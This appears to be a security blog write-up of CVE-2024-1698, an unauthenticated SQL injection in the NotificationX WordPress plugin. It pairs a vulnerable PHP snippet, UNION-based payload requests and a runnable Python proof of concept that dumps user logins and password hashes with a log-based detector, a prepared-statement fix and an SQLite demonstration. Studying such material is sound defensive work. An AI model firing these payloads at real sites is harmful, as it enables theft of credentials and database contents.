CVE-2024-1698 - Critical SQL Injection in NotificationX WordPress Plugin — Exploit Analysis and Walkthrough

The open-source WordPress plugin NotificationX (up to version 2.8.2) is meant to boost conversions by showing sales popups, review alerts, and other FOMO/notification widgets. However, a serious security hole—CVE-2024-1698—has been uncovered. In all versions up to and including v2.8.2, the plugin is vulnerable to SQL Injection through the 'type' parameter, because the user-supplied value reaches the query without sufficient sanitization or escaping.

In this post, you’ll learn what the vulnerability is, how it works (code included), and see proof-of-concept exploitation. This is an original deep-dive for readers who want a practical grasp of this threat.

What is CVE-2024-1698?

- Plugin: NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor
- Vulnerability Type: Unauthenticated SQL Injection via the type parameter
- Threat: An attacker can inject raw SQL, leaking sensitive data (like user password hashes), or even fully compromise the database.

References:

- Wordfence Advisory
- WPScan Entry
- Patchstack Blog Post

How the NotificationX SQL Injection Works

We’ll break down where the vulnerability lies, why escaping was insufficient, and show how attackers abuse it.

The Core Problem in Code

NotificationX is intended to take simple input types like 'sales', 'review', etc., via a GET or POST parameter named type, to show the right notification. But there’s no sanitizing or escaping applied to the incoming user-supplied value.

A typical insecure PHP snippet looks like this:

// Vulnerable code snippet (simplified)
$type = $_GET['type']; // NO sanitization or validation!

$sql = "SELECT * FROM {$wpdb->prefix}nx_notifications WHERE type = '{$type}'";
$notifications = $wpdb->get_results($sql);

// BAD: the $type parameter is injected directly into the SQL string

If an attacker supplies a malicious type parameter, say:

GET /wp-admin/admin-ajax.php?action=notificationx_fetch&type=' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

the meaning of the SQL query changes entirely: the closing quote ends the intended string literal, and the rest of the value becomes part of the statement, exposing user credentials or running other SQL of the attacker's choosing.

Step 1: Find the Target Endpoint

The plugin exposes AJAX endpoints (often at /wp-admin/admin-ajax.php) accessible without login, where type is read from the request.

Step 2: Craft the Payload

Let’s say you want to dump usernames and hashed passwords from the wp_users table.

Malicious Request:

POST /wp-admin/admin-ajax.php?action=notificationx_fetch&type=' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

Or, in URL format:

https://target.wordpress.site/wp-admin/admin-ajax.php?action=notificationx_fetch&type='; UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

Step 3: Receive Exfiltrated Data

The SQL result is returned as JSON. The attacker parses the JSON, revealing usernames and password hashes.

Sample Response (abbreviated):

[
  {
    "type": "admin",
    "notification": "$P$BylwrjK...hashedPassword...",
    ...
  }
]

Exploit Proof-of-Concept (PoC) Python Script

import requests

url = "https://target.wordpress.site/wp-admin/admin-ajax.php"
payload = "' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -"
params = {
    "action": "notificationx_fetch",
    "type": payload
}

resp = requests.post(url, data=params)
print(resp.text)

Note: Replace https://target.wordpress.site with the URL of the vulnerable site.
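Requests like the ones above leave a trace in the web server's access log, which is where a site owner can look for exploitation attempts. The following Python script is an added example for this write-up, not the PoC above and not NotificationX code: it parses constructed Apache/Nginx combined-format log lines, decodes the query string the way the plugin would see it, and flags hits on the notificationx_fetch action whose type value carries SQL metacharacters. The allow-list of legitimate types and the sample log lines are assumptions; the action name and the payload shape come from the requests shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in the common "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=notificationx_fetch&type=sales HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Feb/2024:10:01:07 +0000] "GET /wp-admin/admin-ajax.php?action=notificationx_fetch&type=%27%20UNION%20SELECT%20user_login%2C%20user_pass%2C%201%2C%202%20FROM%20wp_users%20--%20- HTTP/1.1" 200 2048 "-" "python-requests"
203.0.113.9 - - [27/Feb/2024:10:01:09 +0000] "POST /wp-admin/admin-ajax.php?action=notificationx_fetch HTTP/1.1" 200 2048 "-" "python-requests"
198.51.100.7 - - [27/Feb/2024:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=notificationx_fetch&type=review HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# AJAX action name as it appears in the requests quoted in the write-up.
TARGET_ACTION = "notificationx_fetch"

# Assumed allow-list of legitimate notification types (the plugin's real list may differ).
ALLOWED_TYPES = {"sales", "review"}

# Indicators drawn from the payload shape in the write-up: a quote to break out of the
# string literal, UNION/SELECT to graft a second query, comment sequences to drop the tail.
SQLI_RE = re.compile(r"'|--|/\*|\bunion\b|\bselect\b", re.IGNORECASE)


def find_injection_attempts(log_text):
    """Return findings for requests that abuse the NotificationX 'type' parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        url = urlsplit(m.group("path"))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are inspected as the plugin sees them
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("action", [None])[0] != TARGET_ACTION:
            continue
        base = {"ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status"))}
        types = qs.get("type", [])
        if types:
            for value in types:
                if value in ALLOWED_TYPES:
                    continue
                if SQLI_RE.search(value):
                    findings.append({**base, "confidence": "high", "type": value,
                                     "reason": "SQL metacharacters in 'type'"})
                else:
                    findings.append({**base, "confidence": "medium", "type": value,
                                     "reason": "'type' not in allow-list"})
        elif m.group("method") == "POST":
            # A body-carried 'type' is never written to the access log, so only the
            # action is visible; report it for correlation rather than as proof.
            findings.append({**base, "confidence": "low", "type": None,
                             "reason": "POST to vulnerable action; body not visible in access log"})
    return findings


if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"[{f['confidence']}] {f['time']} {f['ip']} {f['reason']}: {f['type']!r}")
```

Note the limitation the third sample line illustrates: the PoC script sends both action and type in the POST body, so in the access log such a request is indistinguishable from any other POST to admin-ajax.php. Catching that variant needs a WAF with body inspection or application-level request logging, not just the access log.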

The only real solution is to sanitize and validate user input and to pass it to the database through a parameterized query:

// Safe code example
global $wpdb;

// Unslash and sanitize the raw request value; default to an empty string when absent.
$type = isset( $_GET['type'] ) ? sanitize_text_field( wp_unslash( $_GET['type'] ) ) : '';

// $wpdb->prepare() binds the value as a string (%s) so it can never change the query's structure.
$notifications = $wpdb->get_results(
    $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}nx_notifications WHERE type = %s", $type )
);

- WordPress: Sanitize, Escape, and Validate User Data
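To make the difference between the vulnerable snippet and the fix tangible, here is an added example in Python against an in-memory SQLite database; it is not the plugin's code and not part of this write-up. It rebuilds both tables from the "Core Problem in Code" section with constructed rows, runs the write-up's payload through a query built by string interpolation (the vulnerable pattern) and through a bound parameter (the sqlite3 analogue of $wpdb->prepare's %s), and adds an allow-list check as defense in depth. The table layouts, the sample rows and the allow-list are assumptions.

```python
import sqlite3

# Payload quoted from the write-up; used here only as input to the two query styles.
PAYLOAD = "' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -"

# Assumed allow-list of legitimate notification types (the plugin's real list may differ).
ALLOWED_TYPES = frozenset({"sales", "review"})


def build_demo_db():
    """In-memory SQLite stand-in for the two WordPress tables; every row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE nx_notifications (type TEXT, notification TEXT, position INTEGER, enabled INTEGER);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO nx_notifications VALUES ('sales', 'Someone bought Widget', 1, 1);
        INSERT INTO nx_notifications VALUES ('review', 'Five stars for Widget', 2, 1);
        INSERT INTO wp_users VALUES ('admin', '$P$EXAMPLEHASH-constructed');
        INSERT INTO wp_users VALUES ('editor', '$P$EXAMPLEHASH-constructed2');
    """)
    return conn


def fetch_unsafe(conn, type_value):
    """Mirrors the vulnerable PHP: the value is spliced into the SQL text itself."""
    sql = f"SELECT * FROM nx_notifications WHERE type = '{type_value}'"
    return conn.execute(sql).fetchall()


def fetch_safe(conn, type_value):
    """Mirrors $wpdb->prepare(): the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT * FROM nx_notifications WHERE type = ?"
    return conn.execute(sql, (type_value,)).fetchall()


def is_allowed_type(type_value):
    """Defense in depth: only known notification types should reach the database at all."""
    return type_value in ALLOWED_TYPES


def leaked_hashes(rows):
    """Collect any cells in a result set that look like WordPress (phpass, '$P$') password hashes."""
    return [cell for row in rows for cell in row
            if isinstance(cell, str) and cell.startswith("$P$")]


if __name__ == "__main__":
    conn = build_demo_db()
    print("unsafe, normal input:", fetch_unsafe(conn, "sales"))
    print("unsafe, payload:     ", fetch_unsafe(conn, PAYLOAD))  # rows from wp_users appear
    print("safe,   payload:     ", fetch_safe(conn, PAYLOAD))    # no rows: the payload is just a string
    print("allow-listed?        ", is_allowed_type(PAYLOAD))      # False: rejected before any query
```

With the interpolated query the UNION grafts the wp_users rows onto the result, which is exactly the leak the sample response above shows; with the bound parameter the same string is compared literally against the type column and matches nothing. The allow-list is the cheap second layer: even if a future query forgets to use prepare(), an unexpected value never reaches it.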

If you use NotificationX (≤ 2.8.2):
Update to the latest version immediately. If no patch is available, disable the plugin until one is released.

Conclusion

CVE-2024-1698 is a textbook example of why user input must never be trusted. This high-severity bug in NotificationX allows unauthenticated attackers to steal any data they want from a WordPress site’s database. Updating your plugins and keeping up with security advisories is critical for website owners and administrators.

References

- WPScan: CVE-2024-1698
- Wordfence Alert
- Patchstack Vulnerability Database

Timeline

Published on: 02/27/2024 06:15:46 UTC
Last modified on: 02/27/2024 14:20:06 UTC